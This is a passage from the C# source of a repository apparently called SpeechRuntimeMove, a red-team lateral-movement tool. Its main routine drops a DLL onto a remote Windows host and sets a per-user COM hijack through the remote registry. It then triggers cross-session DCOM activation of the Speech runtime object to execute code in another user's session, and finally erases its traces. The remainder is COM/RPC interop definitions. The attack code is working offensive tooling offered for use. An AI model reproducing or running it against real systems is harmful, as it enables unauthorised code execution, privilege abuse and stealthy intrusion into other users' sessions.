 68 |                     command = arg.Substring(8);
 69 |                 }
 70 |                 else if (arg.StartsWith("session=", StringComparison.OrdinalIgnoreCase))
 71 |                 {
 72 |                     sessionstr = arg.Substring(8);
 73 |                 }
 74 |             }
 75 | 
 76 |             // Display help if no arguments or missing required parameters
 77 |             if (args.Length == 0 || targetIP == null)
 78 |             {
 79 |                 DisplayHelp();
 80 |                 return;
 81 |             }
 82 | 
 83 |             // Execute based on mode
 84 |             switch (mode)
 85 |             {
 86 |                 case "enum":
 87 |                     Console.WriteLine($"[+] Enumerating sessions on {targetIP}...");
 88 |                     SpeechRuntimeMove.SessionEnum.enumerate(targetIP);
 89 |                     break;
 90 | 
 91 |                 case "attack":
 92 |                     if (dllPath == null || targetUser == null || command == null)
 93 |                     {
 94 |                         Console.WriteLine("[!] Error: Attack mode requires dllpath and targetuser as well as command parameters");
 95 |                         DisplayHelp();
 96 |                         return;
 97 |                     }
 98 | 
 99 |                     if (FileDrop.DropIt(targetIP, dllPath, command))
100 |                     {
101 |                         Console.WriteLine($"[+] DLL dropped successfully!");
102 |                     }
103 |                     else
104 |                     {
105 |                         Console.WriteLine($"[-] DLL dropping failed!");
106 |                         //return;
107 |                     }
108 | 
109 |                     Console.WriteLine($"[+] Attempting COM hijack on {targetIP} for user {targetUser}");
110 |                     RemoteRegistry.WriteRegistryEntryForUser(targetIP, targetUser, dllPath);
111 | 
112 |                     if (RemoteRegistry.VerifyRegistryEntry(targetIP, targetUser, dllPath))
113 |                     {
114 |                         Console.WriteLine("[+] Target user COM Hijack is set!");
115 |                         MoveIt.Execute(targetIP, "", "", "", "", sessionstr);
116 |                         Thread.Sleep(5000);
117 | 
118 |                         // cleanup everything
119 |                         RemoteRegistry.DeleteRegistryEntry(targetIP, targetUser);
120 |                         if (!RemoteRegistry.VerifyRegistryEntry(targetIP, targetUser, dllPath))
121 |                         {
122 |                             Console.WriteLine("[+] Target user COM Hijack is removed!");
123 |                         }
124 |                         RemoteRegistry.DisableRemoteRegistryViaWMI(targetIP);
125 |                         FileDrop.RemoveFile(targetIP, dllPath);
126 |                     }
127 | 
128 |                     break;
129 | 
130 |                 default:
131 |                     Console.WriteLine($"[!] Unknown mode: {mode}");
132 |                     DisplayHelp();
133 |                     break;
134 |             }
135 | 
136 |             
137 |             // Ensure that if username, password, and domain are provided, they are valid
138 |             /*if (username != null && password != null && domain != null)
139 |             {
140 |                 Server.Execute(targetIP, null, username, password, domain);
141 |             }*/
142 |             
143 |             
144 |         }
145 |     }
146 | 
147 |     static class MoveIt
148 |     {
149 | 
150 |         // Speech Named Pipe COM CLSID
151 |         public static Guid clsid = new Guid("38FE8DFE-B129-452B-A215-119382B89E3D");
152 |         public static IntPtr clsid_ptr = SpeechRuntimeMove.Definitions.GuidToPointer(clsid);
153 | 
154 |         public static void Execute(string targetIP, string path, string username, string password, string domain, string sessionstr)
155 |         {
156 | 
157 | 
158 |             IntPtr pAuthIdentity = IntPtr.Zero;
159 |             IntPtr pAuthInfo = IntPtr.Zero;
160 |             IntPtr pIID = IntPtr.Zero;
161 |             SpeechRuntimeMove.Definitions.COSERVERINFO serverInfoPtr = new SpeechRuntimeMove.Definitions.COSERVERINFO();
162 | 
163 |             try
164 |             {
165 | 
166 |                 if (username == "")
167 |                 {
168 |                     COAUTHINFO authInfo = new COAUTHINFO();
169 |                     InitAuthStructs(ref authInfo);
170 |                     pAuthInfo = Marshal.AllocCoTaskMem(Marshal.SizeOf(typeof(COAUTHINFO)));
171 |                     Marshal.StructureToPtr(authInfo, pAuthInfo, false);
172 |                 }
173 |                 else
174 |                 {
175 | 
176 | 
177 |                     SpeechRuntimeMove.Definitions.COAUTHIDENTITY authIdentity = new SpeechRuntimeMove.Definitions.COAUTHIDENTITY
178 |                     {
179 |                         User = username,
180 |                         Domain = domain,
181 |                         Password = password,
182 |                         UserLength = (uint)username.Length,
183 |                         DomainLength = (uint)domain.Length,
184 |                         PasswordLength = (uint)password.Length,
185 |                         Flags = 2 // SEC_WINNT_AUTH_IDENTITY_UNICODE
186 |                     };
187 | 
188 |                     // Allocate and marshal authentication identity
189 |                     pAuthIdentity = Marshal.AllocCoTaskMem(Marshal.SizeOf(typeof(COAUTHIDENTITY)));
190 |                     Marshal.StructureToPtr(authIdentity, pAuthIdentity, false);
191 | 
192 |                     // Create authentication info
193 |                     COAUTHINFO authInfo = new COAUTHINFO
194 |                     {
195 |                         dwAuthnSvc = RPC_C_AUTHN_WINNT,
196 |                         dwAuthzSvc = RPC_C_AUTHZ_NONE,
197 |                         pwszServerPrincName = IntPtr.Zero,
198 |                         dwAuthnLevel = RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
199 |                         dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE,
200 |                         pAuthIdentityData = pAuthIdentity,
201 |                         dwCapabilities = EOAC_NONE
202 |                     };
203 | 
204 |                     // Allocate and marshal authentication info
205 |                     pAuthInfo = Marshal.AllocCoTaskMem(Marshal.SizeOf(typeof(COAUTHINFO)));
206 |                     Marshal.StructureToPtr(authInfo, pAuthInfo, false);
207 |                 }
208 | 
209 |                 serverInfoPtr.pAuthInfo = pAuthInfo;
210 |                 serverInfoPtr.pwszName = targetIP;
211 | 
212 | 
213 |                 SpeechRuntimeMove.Definitions.MULTI_QI[] qis = new SpeechRuntimeMove.Definitions.MULTI_QI[1];
214 | 
215 | 
216 |                 if (!uint.TryParse(sessionstr, out uint session))
217 |                 {
218 |                     Console.WriteLine("[-] Invalid Session id");
219 |                     return;
220 |                 }
221 | 
222 | 
223 |                 Console.WriteLine("[*] Registering...");
224 |                 var ba = GetMarshalledObject(new object());
225 |                 COMObjRefStandard std = (COMObjRefStandard)COMObjRef.FromArray(ba);
226 |                 Debug.WriteLine($"[*] IPID: {std.Ipid}");
227 |                 Debug.WriteLine($"[!] OXID: {std.Oxid:X08}");
228 |                 Debug.WriteLine($"[!] OID : {std.Oid:X08}");
229 |                 Console.WriteLine("[+] Register success");
230 | 
231 |                 std.StringBindings.Clear();
232 |                 Debug.WriteLine($"[!] Adding {"empty hostname"} to OBJREF");
233 |                 // What about? RpcTowerId.NetbiosTcp....
234 |                 // UPD: Firewall....
235 |                 std.StringBindings.Add(new COMStringBinding(RpcTowerId.Tcp, ""));
236 |                 Debug.WriteLine($"[?] OBJREF: {std.ToMoniker()}");
237 | 
238 |                 RpcServerUseProtseqEp("ncacn_ip_tcp", 20, "135", IntPtr.Zero);
239 |                 RpcServerRegisterAuthInfo(null, 16, IntPtr.Zero, IntPtr.Zero);
240 | 
241 | 
242 |                 int result;
243 |                 result = CreateILockBytesOnHGlobal(IntPtr.Zero, true, out ILockBytes lockBytes);
244 |                 result = StgCreateDocfileOnILockBytes(lockBytes, SpeechRuntimeMove.Definitions.STGM.CREATE | SpeechRuntimeMove.Definitions.STGM.READWRITE | SpeechRuntimeMove.Definitions.STGM.SHARE_EXCLUSIVE, 0, out IStorage storage);
245 | 
246 |                 // we could trigger authentication here to a remote host, but we dont need this as we execute code instead :-P
247 |                 var storageTrigger = new SpeechRuntimeMove.Definitions.StorageTrigger(storage, "", SpeechRuntimeMove.Definitions.TowerProtocol.EPM_PROTOCOL_TCP, std);
248 | 
249 |                 // IID of ISpeechNamedPipe
250 |                 Guid iid = new Guid("67C43788-DFDE-464E-BAA1-5AFA424895FD");
251 |                 IntPtr iid_ptr = SpeechRuntimeMove.Definitions.GuidToPointer(iid);
252 |                 qis[0] = new SpeechRuntimeMove.Definitions.MULTI_QI();
253 |                 qis[0].pIID = iid_ptr;
254 | 
255 |                 var pComAct = (SpeechRuntimeMove.Definitions.IStandardActivator)new SpeechRuntimeMove.Definitions.StandardActivator();
256 |                 var CLSID_ComActivator = new Guid("{0000033C-0000-0000-c000-000000000046}");
257 |                 var IID_IStandardActivator = typeof(SpeechRuntimeMove.Definitions.IStandardActivator).GUID;
258 |                 
259 |                 var ht = CoCreateInstance(ref CLSID_ComActivator, null, 0x1, ref IID_IStandardActivator, out object instance);
260 |                 
261 |                 if (ht != 0)
262 |                 {
263 |                     Console.WriteLine($"[-] CoCreateInstance failed with HRESULT: 0x{ht:X}");
264 |                     throw new COMException("[-] CoCreateInstance failed");
265 |                 }
266 |                 else
267 |                 {
268 |                     Console.WriteLine("[+] CoCreateInstance succeeded!");
269 |                 }
270 |                 pComAct = (SpeechRuntimeMove.Definitions.IStandardActivator)instance;
271 |                 var props = (SpeechRuntimeMove.Definitions.ISpecialSystemPropertiesActivator)pComAct;
272 | 
273 |                 Console.WriteLine($"[*] Targetting session {session}");
274 |                 props.SetSessionId((int)session, 0, 1);
275 | 
276 |                 try
277 |                 {
278 |                     result = pComAct.StandardGetInstanceFromIStorage(serverInfoPtr, clsid, IntPtr.Zero, SpeechRuntimeMove.Definitions.CLSCTX.CLSCTX_REMOTE_SERVER, storageTrigger, 1, qis);
279 |                 }
280 |                 catch (Exception e)
281 |                 {
282 |                     //Console.WriteLine("[!] Done");
283 |                     //Console.WriteLine(e);
284 |                 }
285 |                 Console.WriteLine("[*] Done");
286 | 
287 | 
288 |             }
289 |             catch (Exception e)
290 |             {
291 |                 Console.WriteLine("[-] Error while calling remote COM object:");
292 |                 Console.WriteLine(e);
293 |             }
294 |         }
295 |     }
296 | }
297 | 


--------------------------------------------------------------------------------
/SpeechRuntimeMove/ComUtilities.cs:
--------------------------------------------------------------------------------
  1 | //    This file is part of OleViewDotNet.
  2 | //    Copyright (C) James Forshaw 2014
  3 | //
  4 | //    OleViewDotNet is free software: you can redistribute it and/or modify
  5 | //    it under the terms of the GNU General Public License as published by
  6 | //    the Free Software Foundation, either version 3 of the License, or
  7 | //    (at your option) any later version.
  8 | //
  9 | //    OleViewDotNet is distributed in the hope that it will be useful,
 10 | //    but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | //    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | //    GNU General Public License for more details.
 13 | //
 14 | //    You should have received a copy of the GNU General Public License
 15 | //    along with OleViewDotNet.  If not, see <http://www.gnu.org/licenses/>.
 16 | 
 17 | using System;
 18 | using System.Collections.Generic;
 19 | using System.Diagnostics;
 20 | using System.IO;
 21 | using System.Reflection;
 22 | using System.Runtime.InteropServices;
 23 | using System.Text;
 24 | using System.Threading;
 25 | 
 26 | //using System.Windows.Forms;
 27 | 
 28 | namespace SpeechRuntimeMove
 29 | {
 30 |     internal class TypeLibCallback
 31 |     {
 32 |         public void ReportEvent(ImporterEventKind eventKind, int eventCode, string eventMsg)
 33 |         {
 34 |             if ((eventKind == ImporterEventKind.NOTIF_TYPECONVERTED) && (_progress != null))
 35 |             {
 36 |                 _progress.Report(new Tuple<string, int>(eventMsg, -1));
 37 |             }
 38 |         }
 39 | 
 40 |         public TypeLibCallback(IProgress<Tuple<string, int>> progress)
 41 |         {
 42 |             _progress = progress;
 43 |         }
 44 | 
 45 |         private IProgress<Tuple<string, int>> _progress;
 46 |     }
 47 | 
 48 |     public class RegistryValue
 49 |     {
 50 |         public string Name { get; }
 51 |         public object Value { get; }
 52 | 
 53 |         internal RegistryValue(string name, object value)
 54 |         {
 55 |             Name = name;
 56 |             Value = value ?? string.Empty;
 57 |         }
 58 |     }
 59 | 
 60 |     [Flags]
 61 |     public enum CLSCTX : uint
 62 |     {
 63 |         INPROC_SERVER = 0x1,
 64 |         INPROC_HANDLER = 0x2,
 65 |         LOCAL_SERVER = 0x4,
 66 |         INPROC_SERVER16 = 0x8,
 67 |         REMOTE_SERVER = 0x10,
 68 |         INPROC_HANDLER16 = 0x20,
 69 |         RESERVED1 = 0x40,
 70 |         RESERVED2 = 0x80,
 71 |         RESERVED3 = 0x100,
 72 |         RESERVED4 = 0x200,
 73 |         NO_CODE_DOWNLOAD = 0x400,
 74 |         RESERVED5 = 0x800,
 75 |         NO_CUSTOM_MARSHAL = 0x1000,
 76 |         ENABLE_CODE_DOWNLOAD = 0x2000,
 77 |         NO_FAILURE_LOG = 0x4000,
 78 |         DISABLE_AAA = 0x8000,
 79 |         ENABLE_AAA = 0x10000,
 80 |         FROM_DEFAULT_CONTEXT = 0x20000,
 81 |         ACTIVATE_32_BIT_SERVER = 0x40000,
 82 |         ACTIVATE_64_BIT_SERVER = 0x80000,
 83 |         ENABLE_CLOAKING = 0x100000,
 84 |         APPCONTAINER = 0x400000,
 85 |         ACTIVATE_AAA_AS_IU = 0x800000,
 86 |         ACTIVATE_NATIVE_SERVER = 0x1000000,
 87 |         ACTIVATE_ARM32_SERVER = 0x2000000,
 88 |         PS_DLL = 0x80000000,
 89 |         SERVER = INPROC_SERVER | LOCAL_SERVER | REMOTE_SERVER,
 90 |         ALL = INPROC_SERVER | INPROC_HANDLER | LOCAL_SERVER | REMOTE_SERVER
 91 |     }
 92 | 
 93 |     [Flags]
 94 |     public enum REGCLS
 95 |     {
 96 |         SINGLEUSE = 0,
 97 |         MULTIPLEUSE = 1,
 98 |         MULTI_SEPARATE = 2,
 99 |         SUSPENDED = 4,
100 |         SURROGATE = 8,
101 |         AGILE = 0x10,
102 |     }
103 | 
104 |     [Flags]
105 |     public enum STGM
106 |     {
107 |         READ = 0x00000000,
108 |         WRITE = 0x00000001,
109 |         READWRITE = 0x00000002,
110 |         SHARE_DENY_NONE = 0x00000040,
111 |         SHARE_DENY_READ = 0x00000030,
112 |         SHARE_DENY_WRITE = 0x00000020,
113 |         SHARE_EXCLUSIVE = 0x00000010,
114 |         PRIORITY = 0x00040000,
115 |         CREATE = 0x00001000,
116 |         CONVERT = 0x00020000,
117 |         FAILIFTHERE = READ,
118 |         DIRECT = READ,
119 |         TRANSACTED = 0x00010000,
120 |         NOSCRATCH = 0x00100000,
121 |         NOSNAPSHOT = 0x00200000,
122 |         SIMPLE = 0x08000000,
123 |         DIRECT_SWMR = 0x00400000,
124 |         DELETEONRELEASE = 0x04000000
125 |     }
126 | 
127 | 
128 |     public enum RPC_AUTHN_LEVEL
129 |     {
130 |         DEFAULT = 0,
131 |         NONE = 1,
132 |         CONNECT = 2,
133 |         CALL = 3,
134 |         PKT = 4,
135 |         PKT_INTEGRITY = 5,
136 |         PKT_PRIVACY = 6,
137 |     }
138 | 
139 |     public enum RPC_IMP_LEVEL
140 |     {
141 |         DEFAULT = 0,
142 |         ANONYMOUS = 1,
143 |         IDENTIFY = 2,
144 |         IMPERSONATE = 3,
145 |         DELEGATE = 4,
146 |     }
147 | 
148 | 
149 |     public enum MSHCTX
150 |     {
151 |         LOCAL = 0,
152 |         NOSHAREDMEM = 1,
153 |         DIFFERENTMACHINE = 2,
154 |         INPROC = 3,
155 |         CROSSCTX = 4,
156 |         RESERVED1 = 5,
157 |     }
158 | 
159 |     public enum MSHLFLAGS
160 |     {
161 |         NORMAL = 0,
162 |         TABLESTRONG = 1,
163 |         TABLEWEAK = 2,
164 |         NOPING = 4
165 |     }
166 | 
167 | 
168 |     [StructLayout(LayoutKind.Sequential)]
169 |     public struct OptionalGuid : IDisposable
170 |     {
171 |         private IntPtr pGuid;
172 | 
173 |         void IDisposable.Dispose()
174 |         {
175 |             if (pGuid != IntPtr.Zero)
176 |             {
177 |                 Marshal.FreeCoTaskMem(pGuid);
178 |                 pGuid = IntPtr.Zero;
179 |             }
180 |         }
181 | 
182 |         public OptionalGuid(Guid guid)
183 |         {
184 |             pGuid = Marshal.AllocCoTaskMem(16);
185 |             Marshal.Copy(guid.ToByteArray(), 0, pGuid, 16);
186 |         }
187 |     }
188 | 
189 |     [StructLayout(LayoutKind.Sequential)]
190 |     public struct MULTI_QI : IDisposable
191 |     {
192 |         private OptionalGuid pIID;
193 |         private IntPtr pItf;
194 |         private int hr;
195 | 
196 |         public object GetObject()
197 |         {
198 |             if (pItf == IntPtr.Zero)
199 |             {
200 |                 return null;
201 |             }
202 |             else
203 |             {
204 |                 return Marshal.GetObjectForIUnknown(pItf);
205 |             }
206 |         }
207 | 
208 |         public IntPtr GetObjectPointer()
209 |         {
210 |             if (pItf != IntPtr.Zero)
211 |             {
212 |                 Marshal.AddRef(pItf);
213 |             }
214 |             return pItf;
215 |         }
216 | 
217 |         public int HResult()
218 |         {
219 |             return hr;
220 |         }
221 | 
222 |         void IDisposable.Dispose()
223 |         {
224 |             ((IDisposable)pIID).Dispose();
225 |             if (pItf != IntPtr.Zero)
226 |             {
227 |                 Marshal.Release(pItf);
228 |                 pItf = IntPtr.Zero;
229 |             }
230 |         }
231 | 
232 |         public MULTI_QI(Guid iid)
233 |         {
234 |             pIID = new OptionalGuid(iid);
235 |             pItf = IntPtr.Zero;
236 |             hr = 0;
237 |         }
238 |     }
239 | 
240 |     [StructLayout(LayoutKind.Sequential)]
241 |     public sealed class COSERVERINFO : IDisposable
242 |     {
243 |         private int dwReserved1;
244 | 
245 |         [MarshalAs(UnmanagedType.LPWStr)]
246 |         private string pwszName;
247 | 
248 |         private IntPtr pAuthInfo;
249 |         private int dwReserved2;
250 | 
251 |         void IDisposable.Dispose()
252 |         {
253 |             if (pAuthInfo != IntPtr.Zero)
254 |             {
255 |                 Marshal.FreeCoTaskMem(pAuthInfo);
256 |             }
257 |         }
258 | 
259 |         public COSERVERINFO(string name)
260 |         {
261 |             pwszName = name;
262 |         }
263 |     }
264 | 
265 |     [StructLayout(LayoutKind.Sequential)]
266 |     public class BIND_OPTS3
267 |     {
268 |         private int cbStruct;
269 |         public int grfFlags;
270 |         public int grfMode;
271 |         public int dwTickCountDeadline;
272 |         public int dwTrackFlags;
273 |         public CLSCTX dwClassContext;
274 |         public int locale;
275 |         public IntPtr pServerInfo;
276 |         public IntPtr hwnd;
277 | 
278 |         public BIND_OPTS3()
279 |         {
280 |             cbStruct = Marshal.SizeOf(this);
281 |         }
282 |     }
283 | 
284 |     public static class COMUtilities
285 |     {
286 |         private enum RegKind
287 |         {
288 |             RegKind_Default = 0,
289 |             RegKind_Register = 1,
290 |             RegKind_None = 2
291 |         }
292 | 
293 |         internal static byte[] ReadAll(this BinaryReader reader, int length)
294 |         {
295 |             byte[] ret = reader.ReadBytes(length);
296 |             if (ret.Length != length)
297 |             {
298 |                 throw new EndOfStreamException();
299 |             }
300 |             return ret;
301 |         }
302 | 
303 |         internal static Guid ReadGuid(this BinaryReader reader)
304 |         {
305 |             return new Guid(reader.ReadAll(16));
306 |         }
307 | 
308 |         internal static char ReadUnicodeChar(this BinaryReader reader)
309 |         {
310 |             return BitConverter.ToChar(reader.ReadAll(2), 0);
311 |         }
312 | 
313 |         internal static void Write(this BinaryWriter writer, Guid guid)
314 |         {
315 |             writer.Write(guid.ToByteArray());
316 |         }
317 | 
318 |         internal static string ReadZString(this BinaryReader reader)
319 |         {
320 |             StringBuilder builder = new StringBuilder();
321 |             char ch = reader.ReadUnicodeChar();
322 |             while (ch != 0)
323 |             {
324 |                 builder.Append(ch);
325 |                 ch = reader.ReadUnicodeChar();
326 |             }
327 |             return builder.ToString();
328 |         }
329 | 
330 |         internal static void WriteZString(this BinaryWriter writer, string str)
331 |         {
332 |             writer.Write(Encoding.Unicode.GetBytes(str + "\0"));
333 |         }
334 | 
335 |         private static string GetNextToken(string name, out string token)
336 |         {
337 |             token = null;
338 |             if (name.Length == 0)
339 |             {
340 |                 return name;
341 |             }
342 |             int end_index = name.IndexOf('_');
343 |             if (end_index < 0)
344 |             {
345 |                 token = name;
346 |             }
347 |             else
348 |             {
349 |                 token = name.Substring(0, end_index);
350 |             }
351 |             return name.Substring(end_index + 1).TrimStart('_');
352 |         }
353 | 
354 |         private static string GetNextToken(string name, out int token)
355 |         {
356 |             if (name.Length == 0 || !char.IsDigit(name[0]))
357 |             {
358 |                 throw new InvalidDataException("Expected an integer");
359 |             }
360 |             int length = 0;
361 |             while (char.IsDigit(name[length]))
362 |             {
363 |                 length++;
364 |             }
365 | 
366 |             token = int.Parse(name.Substring(0, length));
367 | 
368 |             return name.Substring(length).TrimStart('_');
369 |         }
370 | 
371 |         private static string ReadType(ref string name)
372 |         {
373 |             string token;
374 |             name = GetNextToken(name, out token);
375 |             if (String.IsNullOrEmpty(token))
376 |             {
377 |                 throw new InvalidDataException("Expected a type name");
378 |             }
379 | 
380 |             if (char.IsLetter(token[0]))
381 |             {
382 |                 return token;
383 |             }
384 |             else if (token[0] == '~')
385 |             {
386 |                 StringBuilder builder = new StringBuilder();
387 |                 int type_count;
388 | 
389 |                 name = GetNextToken(name, out type_count);
390 |                 builder.Append(token.Substring(1));
391 |                 builder.Append("<");
392 |                 List<string> types = new List<string>();
393 |                 for (int i = 0; i < type_count; ++i)
394 |                 {
395 |                     types.Add(ReadType(ref name));
396 |                 }
397 |                 builder.Append(String.Join(",", types));
398 |                 builder.Append(">");
399 |                 return builder.ToString();
400 |             }
401 |             else
402 |             {
403 |                 throw new InvalidDataException("Expected a type name or a generic type");
404 |             }
405 |         }
406 | 
407 |         private class ReportQueryProgress
408 |         {
409 |             private int _total_count;
410 |             private int _current;
411 |             private IProgress<Tuple<string, int>> _progress;
412 | 
413 |             private const int MINIMUM_REPORT_SIZE = 25;
414 | 
415 |             public ReportQueryProgress(IProgress<Tuple<string, int>> progress, int total_count)
416 |             {
417 |                 _total_count = total_count;
418 |                 _progress = progress;
419 |             }
420 | 
421 |             public void Report()
422 |             {
423 |                 int current = Interlocked.Increment(ref _current);
424 |                 if ((current % MINIMUM_REPORT_SIZE) == 1)
425 |                 {
426 |                     _progress.Report(new Tuple<string, int>($"Querying Interfaces: {current} of {_total_count}",
427 |                         (100 * current) / _total_count));
428 |                 }
429 |             }
430 |         }
431 | 
432 |         internal static int GetProcessIdFromIPid(Guid ipid)
433 |         {
434 |             return BitConverter.ToUInt16(ipid.ToByteArray(), 4);
435 |         }
436 | 
437 |         internal static int GetApartmentIdFromIPid(Guid ipid)
438 |         {
439 |             return BitConverter.ToInt16(ipid.ToByteArray(), 6);
440 |         }
441 | 
442 |         internal static string GetApartmentIdStringFromIPid(Guid ipid)
443 |         {
444 |             int appid = GetApartmentIdFromIPid(ipid);
445 |             switch (appid)
446 |             {
447 |                 case 0:
448 |                     return "NTA";
449 | 
450 |                 case -1:
451 |                     return "MTA";
452 | 
453 |                 default:
454 |                     return $"STA (Thread ID {appid})";
455 |             }
456 |         }
457 | 
458 |         private static Dictionary<string, Assembly> _cached_reflection_assemblies = new Dictionary<string, Assembly>();
459 | 
460 |         private static Assembly ResolveAssembly(string base_path, string name)
461 |         {
462 |             if (_cached_reflection_assemblies.ContainsKey(name))
463 |             {
464 |                 return _cached_reflection_assemblies[name];
465 |             }
466 | 
467 |             Assembly asm = null;
468 |             if (name.Contains(","))
469 |             {
470 |                 asm = Assembly.ReflectionOnlyLoad(name);
471 |             }
472 |             else
473 |             {
474 |                 string full_path = Path.Combine(base_path, $"{name}.winmd");
475 |                 if (File.Exists(full_path))
476 |                 {
477 |                     asm = Assembly.ReflectionOnlyLoadFrom(full_path);
478 |                 }
479 |                 else
480 |                 {
481 |                     int last_index = name.LastIndexOf('.');
482 |                     if (last_index < 0)
483 |                     {
484 |                         return null;
485 |                     }
486 |                     asm = ResolveAssembly(base_path, name.Substring(0, last_index));
487 |                 }
488 |             }
489 | 
490 |             _cached_reflection_assemblies[name] = asm;
491 |             return _cached_reflection_assemblies[name];
492 |         }
493 | 
494 |         public static string GetProcessNameById(int pid)
495 |         {
496 |             try
497 |             {
498 |                 return Process.GetProcessById(pid).ProcessName;
499 |             }
500 |             catch
501 |             {
502 |                 return string.Empty;
503 |             }
504 |         }
505 | 
506 |         [UnmanagedFunctionPointer(CallingConvention.StdCall)]
507 |         private delegate uint InspectHStringCallback2(IntPtr context, long readAddress, int length, IntPtr buffer);
508 | 
509 |         [UnmanagedFunctionPointer(CallingConvention.StdCall)]
510 |         private delegate uint InspectHStringCallback(IntPtr context, IntPtr readAddress, int length, IntPtr buffer);
511 | 
512 | 
513 |         internal static readonly bool IsWindows81OrLess = Environment.OSVersion.Version < new Version(6, 4);
514 |         internal static readonly bool IsWindows10RS2OrLess = Environment.OSVersion.Version < new Version(10, 0, 16299);
515 |         internal static readonly bool IsWindows10RS3OrLess = Environment.OSVersion.Version < new Version(10, 0, 17134);
516 |         internal static readonly bool IsWindows10RS4OrLess = Environment.OSVersion.Version < new Version(10, 0, 17763);
517 |         internal static readonly bool IsWindows101909OrLess = Environment.OSVersion.Version < new Version(10, 0, 19041);
518 | 
519 | 
520 |     }
521 | }


--------------------------------------------------------------------------------
/SpeechRuntimeMove/Definitions.cs:
--------------------------------------------------------------------------------
   1 | using System;
   2 | using System.Collections.Generic;
   3 | using System.IO;
   4 | using System.Linq;
   5 | using System.Runtime.InteropServices;
   6 | using System.Runtime.InteropServices.ComTypes;
   7 | 
   8 | namespace SpeechRuntimeMove
   9 | {
  10 |     public  class Definitions
  11 |     {
  12 |         [StructLayout(LayoutKind.Sequential)]
  13 |         public struct COAUTHINFO
  14 |         {
  15 |             public uint dwAuthnSvc;
  16 |             public uint dwAuthzSvc;
  17 |             public IntPtr pwszServerPrincName;
  18 |             public uint dwAuthnLevel;
  19 |             public uint dwImpersonationLevel;
  20 |             public IntPtr pAuthIdentityData;
  21 |             public uint dwCapabilities;
  22 |         }
  23 | 
  24 |         [StructLayout(LayoutKind.Sequential)]
  25 |         public struct COAUTHIDENTITY
  26 |         {
  27 |             [MarshalAs(UnmanagedType.LPWStr)]
  28 |             public string User;
  29 |             [MarshalAs(UnmanagedType.U4)]
  30 |             public uint UserLength;
  31 |             [MarshalAs(UnmanagedType.LPWStr)]
  32 |             public string Domain;
  33 |             [MarshalAs(UnmanagedType.U4)]
  34 |             public uint DomainLength;
  35 |             [MarshalAs(UnmanagedType.LPWStr)]
  36 |             public string Password;
  37 |             [MarshalAs(UnmanagedType.U4)]
  38 |             public uint PasswordLength;
  39 |             public uint Flags;
  40 |         }
  41 | 
  42 |         
  43 |         [ComImport(), Guid("884CCD87-B139-4937-A4BA-4F8E19513FBE"),
  44 | InterfaceTypeAttribute(ComInterfaceType.InterfaceIsIUnknown)
  45 | ]
  46 |         public interface ISyncMgrSyncCallback
  47 |         {
  48 |         }
  49 | 
  50 |         [ComImport, Guid("17F48517-F305-4321-A08D-B25A834918FD"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
  51 |         interface SyncMgrSessionCreator
  52 |         {
  53 |             [PreserveSig]
  54 |             int CreateSession([In, MarshalAs(UnmanagedType.LPWStr)] string pszHandlerID,
  55 |              [In, MarshalAs(UnmanagedType.LPWStr)] ref string ppszItemIDs,
  56 |              [In] uint cItems,
  57 |              [MarshalAs(UnmanagedType.Interface)] out ISyncMgrSyncCallback ppCallback);
  58 |         }
  59 | 
  60 |         [DllImport("ole32.dll")]
  61 |         public static extern int CoInitializeSecurity(
  62 |             IntPtr pSecDesc,
  63 |             int cAuthSvc,
  64 |             IntPtr asAuthSvc,
  65 |             IntPtr pReserved1,
  66 |             int dwAuthnLevel,
  67 |             int dwImpLevel,
  68 |             IntPtr pAuthList,
  69 |             int dwCapabilities,
  70 |             IntPtr pReserved3);
  71 | 
  72 |         [DllImport("ole32.dll")]
  73 |         public static extern int CoCreateInstanceEx(in Guid rclsid, IntPtr punkOuter, SpeechRuntimeMove.Definitions.CLSCTX dwClsCtx, IntPtr pServerInfo, int dwCount, [In, Out] SpeechRuntimeMove.Definitions.MULTI_QI[] pResults);
  74 | 
  75 | 
  76 |         public const int RPC_C_AUTHN_LEVEL_PKT_PRIVACY = 6;
  77 |         public const int RPC_C_IMP_LEVEL_IMPERSONATE = 3;
  78 |         public const int RPC_C_AUTHN_WINNT = 10;
  79 |         public const int RPC_C_AUTHZ_NONE = 0;
  80 |         public const int EOAC_NONE = 0;
  81 | 
  82 | 
  83 |         public static void InitAuthStructs(ref COAUTHINFO authInfo)
  84 |         {
  85 |             authInfo.dwAuthnSvc = RPC_C_AUTHN_WINNT;
  86 |             authInfo.dwAuthzSvc = RPC_C_AUTHZ_NONE;
  87 |             authInfo.pwszServerPrincName = IntPtr.Zero;
  88 |             authInfo.dwAuthnLevel = RPC_C_AUTHN_LEVEL_PKT_PRIVACY;
  89 |             authInfo.dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE;
  90 |             authInfo.dwCapabilities = EOAC_NONE;
  91 |             authInfo.pAuthIdentityData = IntPtr.Zero; // Use current user's credentials
  92 |         }
  93 | 
  94 |         [DllImport("ole32.Dll")]
  95 |         public static extern uint CoCreateInstance(ref Guid clsid,
  96 |            [MarshalAs(UnmanagedType.IUnknown)] object inner,
  97 |            uint context,
  98 |            ref Guid uuid,
  99 |            [MarshalAs(UnmanagedType.IUnknown)] out object rReturnedComObject);
 100 | 
 101 |         [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)]
 102 |         public static extern int CreateILockBytesOnHGlobal(
 103 |          IntPtr hGlobal,
 104 |          [MarshalAs(UnmanagedType.Bool)] bool fDeleteOnRelease,
 105 |          out ILockBytes ppLkbyt);
 106 | 
 107 |         [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)]
 108 |         public static extern int StgCreateDocfileOnILockBytes(
 109 |            ILockBytes plkbyt,
 110 |            STGM grfMode,
 111 |            uint reserved,
 112 |            out IStorage ppstgOpen);
 113 | 
 114 |         [DllImport("ole32.dll")]
 115 |         public static extern int CreateObjrefMoniker(
 116 |         IntPtr punk,
 117 |         out IMoniker ppmk);
 118 | 
 119 |         [DllImport("ole32.dll")]
 120 |         public static extern int CreateBindCtx(
 121 |               int reserved,
 122 |               out IBindCtx ppbc
 123 |             );
 124 | 
 125 |         [DllImport("ole32.dll")]
 126 |         public static extern void CoUninitialize();
 127 | 
 128 |         [DllImport("rpcrt4.dll")]
 129 |         public static extern int RpcServerUseProtseqEp(
 130 |     string Protseq,
 131 |     uint MaxCalls,
 132 |     string Endpoint,
